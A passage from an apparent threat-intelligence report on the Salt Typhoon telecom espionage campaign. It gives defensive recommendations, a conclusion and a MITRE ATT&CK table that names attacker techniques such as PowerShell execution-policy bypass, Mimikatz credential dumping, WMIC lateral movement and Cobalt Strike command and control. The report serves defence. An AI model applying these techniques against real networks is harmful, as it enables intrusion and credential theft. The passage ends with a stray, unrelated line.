  • Mitigation: Implement firmware signing verification; establish trusted update channels

9. RECOMMENDATIONS BY STAKEHOLDER

9.1 For Telecom Operators

  1. Patch Aggressively: Prioritize CVE-2023-20198/20273 (Cisco), CVE-2024-21887 (Ivanti), CVE-2024-3400 (Palo Alto)
  2. Isolate Management Planes: Use VRFs, dedicated out-of-band networks, and strict ACLs for device management
  3. Disable Unused Features: Turn off Guest Shell, HTTP management interfaces, and legacy protocols if not required
  4. Deploy Behavioral Detection: Implement NDR solutions that detect anomalous lateral movement and credential abuse
  5. Conduct Red Team Exercises: Simulate Salt Typhoon TTPs to validate detection and response capabilities

9.2 For Government Agencies

  1. Mandate Minimum Security Standards: Require telecom providers to implement CISA/NCIIPC baseline controls
  2. Enhance Intelligence Sharing: Establish secure channels for real-time threat intelligence exchange with industry
  3. Fund Critical Infrastructure Protection: Allocate resources for telecom security modernization and incident response
  4. Develop Crisis Response Playbooks: Prepare for scenarios where compromised infrastructure could be weaponized
  5. Coordinate International Response: Work with allies to attribute attacks and impose consequences on state sponsors

9.3 For Security Vendors

  1. Develop Telecom-Specific Detections: Create rules tuned to router CLI commands, SNMP patterns, and telecom protocols
  2. Improve LOTL Detection: Enhance behavioral analytics to distinguish legitimate admin activity from attacker use of native tools
  3. Support Cloud-Native Telecom: Extend detection capabilities to virtualized network functions and cloud-based core networks
  4. Provide Threat Intelligence Feeds: Deliver Salt Typhoon IOCs and TTPs in machine-readable formats for automated ingestion
  5. Offer Incident Response Support: Maintain specialized teams trained in telecom infrastructure forensics

9.4 For Individual Users

  1. Use End-to-End Encrypted Messaging: For sensitive communications, use Signal, WhatsApp (with E2EE enabled), or other encrypted platforms
  2. Enable Multi-Factor Authentication: Protect all accounts, especially email and financial services
  3. Monitor Account Activity: Review login histories and enable alerts for unusual access patterns
  4. Stay Informed: Follow guidance from national CERTs and trusted security sources
  5. Report Suspicious Activity: Notify your service provider or national CERT of potential security incidents

10. CONCLUSION

Salt Typhoon represents a new paradigm in state-sponsored cyber operations: infrastructure control as a strategic capability. Unlike traditional espionage campaigns focused on stealing data, Salt Typhoon seeks to own the communications infrastructure itself—enabling both continuous intelligence collection and potential disruption during crisis.

The campaign’s global scale (80+ countries), technical sophistication (kernel-mode rootkits, living-off-the-land techniques), and strategic patience (3+ year dwell times) demonstrate unprecedented resource allocation by China’s Ministry of State Security. The FBI’s February 2026 confirmation that threats remain “still very much ongoing” underscores that this is not a historical incident but an active, evolving campaign.

Defending against Salt Typhoon requires a fundamental shift:

  • From signature-based detection to behavioral analytics
  • From perimeter security to zero trust architecture
  • From reactive incident response to proactive threat hunting
  • From siloed security teams to integrated network/identity/cloud defense

Organizations operating critical communications infrastructure cannot afford to wait. The window for proactive hardening is narrowing as Salt Typhoon continues to adapt and expand. Immediate action on patching, network segmentation, and behavioral detection is essential to reduce risk.

As the geopolitical landscape evolves, the stakes will only increase. The infrastructure compromised today could become the weapon of tomorrow. Investing in resilience now is not just a security imperative—it is a strategic necessity.


APPENDICES

Appendix A: MITRE ATT&CK Mapping (Summary)

TacticKey Techniques ObservedSalt Typhoon Implementation
Initial AccessT1190: Exploit Public-Facing ApplicationCVE-2023-20198 (Cisco), CVE-2024-21887 (Ivanti)
ExecutionT1059: Command and Scripting InterpreterPowerShell -ex bypass, WMIC remote execution
PersistenceT1547.001: Registry Run Keys; T1610: Deploy Containerreg add commands; Guest Shell container abuse
Privilege EscalationT1068: Exploitation for Privilege EscalationCVE-2023-20273 chaining; Demodex rootkit
Defense EvasionT1027: Obfuscated Files; T1562.004: Disable Security ToolsDouble-encoding; ACL modification to permit attacker IPs
Credential AccessT1003: OS Credential Dumping; T1040: Network SniffingMimikatz; Cisco EPC for TACACS+ capture
DiscoveryT1087: Account Discovery; T1016: System Network Configurationnet group /domain; SNMP enumeration
Lateral MovementT1021: Remote Services; T1570: Lateral Tool TransferSMB copy + WMIC exec; service creation with installutil
CollectionT1005: Data from Local System; T1114: Email CollectionCDR extraction; email harvesting via compromised accounts
Command and ControlT1071: Application Layer Protocol; T1572: Protocol TunnelingCobalt Strike beacons; GRE/IPsec tunnels over routers
ExfiltrationT1048.003: Exfiltration Over Alternative ProtocolEncrypted SFTP via peering connections; low-and-slow transfers

PLA People’s liberation armed forces structure